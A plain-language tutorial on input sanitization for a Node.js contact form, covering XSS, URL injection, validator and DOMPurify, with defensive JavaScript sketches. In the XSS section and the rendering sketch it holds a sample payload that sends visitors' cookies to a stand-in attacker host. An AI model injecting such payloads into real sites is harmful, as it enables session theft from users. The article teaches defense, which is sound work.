Input Sanitization: What It Is and Why It Matters
A plain-language explanation of input sanitization, common web threats, and how to protect your Node.js app
What Is Input Sanitization?
Any time a user can type something into a form on your website, you have a potential security problem. Input sanitization is the process of cleaning that data before your application does anything with it — storing it, emailing it, or displaying it on a page. The goal is to make sure that whatever the user typed cannot be used to attack your application or the people who use it.
The word "sanitize" is a good one. Think of it like washing vegetables before you cook with them. The vegetables might look fine, but you don't actually know what's been on them. You clean them first as a precaution. Input sanitization is the same idea applied to data.
Why Is This Necessary?
The web is a hostile environment. Any form on a public-facing website will eventually receive malicious input — whether from automated bots scanning for vulnerabilities or from people deliberately trying to exploit your application. This is not a hypothetical. It happens constantly, to websites of every size.
The two biggest categories of attack that input sanitization protects against are Cross-Site Scripting (XSS) and injection attacks.
Cross-Site Scripting (XSS)
Cross-Site Scripting, almost always abbreviated as XSS, is an attack where a malicious user submits JavaScript code as their input, hoping that your application will display it back on a webpage where a browser will execute it.
Here is a simple example. Suppose your site has a comments section and you display what users submit directly on the page. An attacker submits this as their comment:
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
If your application renders that directly to the page, every visitor's browser will execute it. That script could steal session cookies, redirect users to phishing sites, log keystrokes, or deface your page entirely. The attacker does not need access to your server — they just need your site to repeat their input back to users.
This is why the rule exists: never trust user input, and never render it raw to a webpage.
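Here is a minimal JavaScript sketch of the difference. One template inserts a comment raw, and the other escapes it first. The names renderCommentUnsafe, renderCommentSafe, and escapeHtml are hypothetical and are not part of the contact form project. The escaping helper covers only the five characters that matter most in HTML; it is a sketch, not a replacement for a maintained library.

```javascript
// Hypothetical helpers for illustration; not taken from the contact form project.

// Minimal escaping of the characters that let text break out into markup.
function escapeHtml(str) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(str).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// UNSAFE: the comment is concatenated straight into the markup, so a
// <script> tag inside it becomes a real script element.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// SAFER: the comment is escaped first, so a browser shows it as plain text.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

const payload =
  "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>";

console.log(renderCommentUnsafe(payload)); // markup still contains <script>
console.log(renderCommentSafe(payload));   // markup contains &lt;script&gt; instead
```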
URL and Link Injection
A simpler but still problematic attack is submitting URLs in form fields. An attacker might submit a link to a phishing site or malware download in a contact form, hoping the link ends up in an email, a database, or a page where someone clicks it. Checking for URLs in input fields and rejecting submissions that contain them is a basic but effective layer of defense.
What We Did and How It Works
On this contact form we used two npm packages: validator and isomorphic-dompurify. Here is what each one does.
validator
validator is a library of string validation and sanitization functions. We used three of its tools:
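validator.isEmail(email): This replaces the hand-written regex that was being used to check email addresses. It applies a much fuller set of rules than a simple pattern and handles edge cases that simple regexes miss. For example, with its default options it rejects addresses that have no top-level domain, such as user@localhost.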
validator.escape(str): This converts characters that have special meaning in HTML into safe equivalents called HTML entities. The less-than sign < becomes &lt;, the greater-than sign > becomes &gt;, the forward slash / becomes &#x2F;, the single quote ' becomes &#x27;, and so on. This is the core defense against XSS. If someone submits <script>alert('attack')</script>, after escaping it becomes &lt;script&gt;alert(&#x27;attack&#x27;)&lt;&#x2F;script&gt;. That is harmless text, which a browser will display as characters rather than execute as code.
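validator.stripLow(str): This removes control characters from the string. These are characters with a code below 32, plus DEL (127). They are invisible and have no legitimate place in most form fields. Carriage return and line feed are the notable case. If a single-line field ever ends up in an email header, injected line breaks can be used to add extra headers. By default stripLow also removes newlines, so a multi-line message field loses its line breaks unless the second argument is set to true, as in validator.stripLow(str, true).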
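The escaping and control-character steps are simple enough to sketch without the library. Doing so makes it easier to see exactly what they do. escapeSketch and stripLowSketch below are hypothetical stand-ins, not validator's code. escapeSketch assumes the character set we understand validator.escape to cover: &, ", ', <, >, /, \, and the backtick. The optional keepNewLines flag on stripLowSketch mirrors the optional second argument of validator.stripLow, which preserves \n and \r. In real code, call the library functions rather than maintaining your own copies.

```javascript
// Hypothetical stand-ins for validator.escape and validator.stripLow,
// written only to show what each transformation does.

const HTML_ENTITIES = {
  "&": "&amp;",
  '"': "&quot;",
  "'": "&#x27;",
  "<": "&lt;",
  ">": "&gt;",
  "/": "&#x2F;",
  "\\": "&#x5C;",
  "`": "&#96;",
};

// Replace every special character in a single pass, so the "&" inside an
// entity produced here is never escaped a second time.
function escapeSketch(str) {
  return String(str).replace(/[&"'<>\/\\`]/g, (ch) => HTML_ENTITIES[ch]);
}

// Remove code points 0-31 and 127 (DEL). With keepNewLines, "\n" (10) and
// "\r" (13) survive, which suits a multi-line message field.
function stripLowSketch(str, keepNewLines = false) {
  const pattern = keepNewLines
    ? /[\x00-\x09\x0B\x0C\x0E-\x1F\x7F]/g
    : /[\x00-\x1F\x7F]/g;
  return String(str).replace(pattern, "");
}

console.log(escapeSketch("<script>alert('attack')</script>"));
// &lt;script&gt;alert(&#x27;attack&#x27;)&lt;&#x2F;script&gt;

const raw = "Hello\x00 there\x07\r\nBye\x7F";
console.log(JSON.stringify(stripLowSketch(raw)));       // "Hello thereBye"
console.log(JSON.stringify(stripLowSketch(raw, true))); // "Hello there\r\nBye"
```

Escaping is not idempotent. Running escapeSketch on its own output turns &lt; into &amp;lt;, so a value should be escaped once, at one well-defined point in the flow.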
isomorphic-dompurify
DOMPurify is a well-known HTML sanitization library. It needs a DOM to do its work. Browsers provide one, but Node.js does not, so the original dompurify package needs a DOM implementation such as jsdom supplied before it can run on a server. isomorphic-dompurify handles that setup, so the same DOMPurify.sanitize call works both in Node.js and in the browser. DOMPurify parses the input as HTML and removes anything that could execute as code: script tags, event handlers like onclick, javascript: URLs, and other attack vectors. It is a second line of defense after validator.escape and is particularly important if you ever display user input on a webpage.
The URL Check
The containsURL function uses a regular expression to scan the input for anything that looks like a web address. If it finds one, the submission is rejected entirely. This is a hard block: a URL in any field means the submission will not go through.
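The article does not reproduce the project's actual regular expression, so the containsURL below is an illustrative assumption. It flags an explicit scheme (http:, https:, ftp:) or a www. prefix. It deliberately matches on the scheme and colon rather than on "://". validator.escape rewrites / as &#x2F;, so a pattern that relies on slashes would stop matching once the input has been escaped.

```javascript
// Hypothetical containsURL: the project's real pattern is not shown, so this
// regex is an illustrative assumption. It flags an explicit scheme
// (http:, https:, ftp:) or a "www." prefix, case-insensitively.
// It keys on "scheme:" rather than "://" because validator.escape turns
// "/" into "&#x2F;", and in this flow the check runs on escaped input.
const URL_PATTERN = /\b(?:https?|ftp):|\bwww\./i;

function containsURL(str) {
  return URL_PATTERN.test(String(str));
}

console.log(containsURL("Visit https://evil.com now")); // true
console.log(containsURL("https:&#x2F;&#x2F;evil.com")); // true (escaped form)
console.log(containsURL("Please call me at 555-0100"));  // false
```

This pattern does not catch bare domains such as evil.com. A bare-domain rule would close that gap, but it would also flag every legitimate address in the email field, so a stricter pattern would need to skip that field.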
The Full Sanitization Flow
When a user submits the contact form, here is the order of operations on the server:
- The raw form data arrives in req.body
- Each field is passed through sanitizeInput(), which runs validator.escape, validator.stripLow, and DOMPurify.sanitize in sequence
- The cleaned values are passed to isValidContactFormSubmit(), which checks that all fields are present, that no URLs are present, and that the email address is valid
- If validation passes, the cleaned data is used to build the email message and send it
- If validation fails, a 400 error is returned
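The sketch below wires those steps together in plain JavaScript so the order is visible in one place. All helpers are hypothetical stand-ins. escapeHtml and stripLow approximate validator.escape and validator.stripLow, and looksLikeEmail is a deliberately simple placeholder for validator.isEmail. sendEmail is a callback standing in for whatever mail transport the project uses. DOMPurify.sanitize is left out on purpose, since a real HTML sanitizer should not be hand-rolled; in the actual flow it would run inside sanitizeInput. handleContactForm takes the parsed request body and returns a status object rather than writing an HTTP response, which keeps the sketch framework-agnostic.

```javascript
// Dependency-free sketch of the contact form flow. Every helper here is a
// hypothetical stand-in; the real project uses validator and isomorphic-dompurify.

const ENTITIES = {
  "&": "&amp;", '"': "&quot;", "'": "&#x27;", "<": "&lt;",
  ">": "&gt;", "/": "&#x2F;", "\\": "&#x5C;", "`": "&#96;",
};
// Approximates validator.escape.
const escapeHtml = (s) => s.replace(/[&"'<>\/\\`]/g, (ch) => ENTITIES[ch]);
// Approximates validator.stripLow with its default (newlines removed too).
const stripLow = (s) => s.replace(/[\x00-\x1F\x7F]/g, "");
// Hypothetical URL check keyed on a scheme or a "www." prefix.
const containsURL = (s) => /\b(?:https?|ftp):|\bwww\./i.test(s);
// Deliberately simple placeholder for validator.isEmail.
const looksLikeEmail = (s) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(s);

// Sanitize one field: escape HTML, then strip control characters.
// (In the real flow, DOMPurify.sanitize would also run here.)
function sanitizeInput(value) {
  return stripLow(escapeHtml(String(value ?? "")));
}

// Validate the already-sanitized values.
function isValidContactFormSubmit({ name, email, message }) {
  const fields = [name, email, message];
  if (fields.some((f) => f.trim() === "")) return false; // every field present
  if (fields.some((f) => containsURL(f))) return false;   // no URLs anywhere
  return looksLikeEmail(email);                            // email well formed
}

// Sanitize, then validate, then use. sendEmail is a hypothetical callback.
function handleContactForm(body, sendEmail) {
  const cleaned = {
    name: sanitizeInput(body.name),
    email: sanitizeInput(body.email),
    message: sanitizeInput(body.message),
  };
  if (!isValidContactFormSubmit(cleaned)) {
    return { status: 400, error: "Invalid submission" };
  }
  sendEmail(cleaned);
  return { status: 200 };
}

const outbox = [];
console.log(handleContactForm(
  { name: "Alice", email: "alice@example.com", message: "Hi, I'd like a quote." },
  (msg) => outbox.push(msg),
)); // { status: 200 }
console.log(handleContactForm(
  { name: "Bob", email: "bob@example.com", message: "Click https://evil.com" },
  (msg) => outbox.push(msg),
)); // { status: 400, error: 'Invalid submission' }
```

Each request goes through the same three stages in the same order, and nothing reaches sendEmail until both sanitization and validation have finished.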
The important thing to understand is that sanitization happens before validation, and validation happens before the data is used for anything. The data is cleaned, then checked, then used — in that order, every time.
A Note on Defense in Depth
No single security measure is sufficient on its own. The approach used here layers multiple defenses: client-side validation in the browser, URL detection, character escaping, HTML sanitization, and email-only output with no database storage or page rendering of user input. Each layer catches things the others might miss. This concept is called defense in depth and it is a foundational principle of application security.
For a project of this scale, the measures implemented here are solid. A production application handling sensitive data would go further: rate limiting to prevent spam and brute-force attacks, CSRF tokens to prevent cross-site request forgery, a Content-Security-Policy (CSP) header, and likely a dedicated input validation middleware layer. But the fundamentals are the same.
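Of those extra measures, rate limiting is the easiest to illustrate in a few lines. The sketch below is a hypothetical fixed-window limiter keyed by a string such as the client IP address. createRateLimiter and its options are illustrative names, not a library API. It keeps its counters in memory and never evicts old keys, so a production application would more likely use maintained middleware backed by a shared store.

```javascript
// Hypothetical fixed-window rate limiter, for illustration only.
// `now` is injectable so the behavior can be tested without waiting.
function createRateLimiter({ limit, windowMs, now = () => Date.now() }) {
  const hits = new Map(); // key (e.g. client IP) -> { count, windowStart }

  return function isAllowed(key) {
    const t = now();
    const entry = hits.get(key);
    if (!entry || t - entry.windowStart >= windowMs) {
      // First request from this key, or its previous window has expired.
      hits.set(key, { count: 1, windowStart: t });
      return true;
    }
    entry.count += 1;
    return entry.count <= limit;
  };
}

// Example: at most 5 submissions per client per 15 minutes.
const allowSubmission = createRateLimiter({ limit: 5, windowMs: 15 * 60 * 1000 });
console.log(allowSubmission("203.0.113.7")); // true (first request in the window)
```

A request handler would call the limiter before doing any other work and reply with HTTP 429 (Too Many Requests) when it returns false.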